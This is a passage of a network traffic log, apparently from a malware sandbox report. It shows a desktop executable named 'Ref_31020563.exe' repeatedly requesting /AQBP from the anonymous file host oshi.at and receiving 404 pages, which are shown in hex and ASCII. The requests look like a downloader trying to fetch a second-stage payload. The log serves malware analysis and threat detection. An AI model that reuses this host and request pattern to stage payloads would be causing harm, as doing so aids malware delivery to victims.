                                          2024-12-10 15:28:10 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.849731194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:12 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:13 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:12 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:13 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.849732194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:15 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:16 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:15 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:16 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.849733194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:18 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:19 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:18 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:19 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.849735194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:21 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:21 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:21 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:21 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.849736194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:23 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:24 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:24 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:24 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.849737194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:26 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:27 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:27 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:27 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.849738194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:29 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:30 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:30 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:30 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.849739194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:32 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:33 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:33 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:33 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.849740194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:35 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:36 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:36 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:36 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.849741194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:38 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:39 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:38 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:39 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.849742194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:41 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:42 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:41 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:42 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.849743194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:44 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:45 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:44 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:45 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.849744194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:47 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:47 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:47 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:47 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.849745194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:49 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:51 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:51 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:51 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.849746194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:53 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:54 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:54 GMT
                                          Content-Type: text/html;charset=UTF-8
